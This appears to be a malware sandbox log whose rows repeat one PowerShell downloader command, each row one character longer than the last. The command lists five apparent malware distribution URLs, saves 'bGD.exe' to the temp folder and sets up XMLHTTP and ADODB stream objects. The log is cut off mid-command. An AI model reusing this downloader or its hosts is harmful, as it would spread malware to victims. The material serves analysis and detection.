| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com ' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'a |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'ad |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'ado |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adod |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.s |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.st |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.str |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stre |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.strea |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream'; |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';f |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';fo |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';for |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';fore |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';forea |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreac |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($T |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Ti |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia i |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $F |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp) |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){t |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){tr |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$r |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$ra |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat. |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.o |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.op |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.ope |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open( |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open(' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('G |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GE |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET' |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET', |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$ |
|
1 | |
| Get Environment String | name = tLAf, result_out = !tLAf!powershell $bbd='uCc';$FJp='http://greatvacationgiveaways.com/i0Qwfwrn@http://ulukantasarim.com/MuRtWv3lI@http://cwbsa.org/POdR1eiw@http://www.bellaechicc.com/HbuY5jle@http://pibuilding.com/2pjNZddK'.Split('@');$nLF=([System.IO.Path]::GetTempPath()+'\bGD.exe');$rat =New-Object -com 'msxml2.xmlhttp';$EHT = New-Object -com 'adodb.stream';foreach($Tia in $FJp){try{$rat.open('GET',$T |
|
1 | |
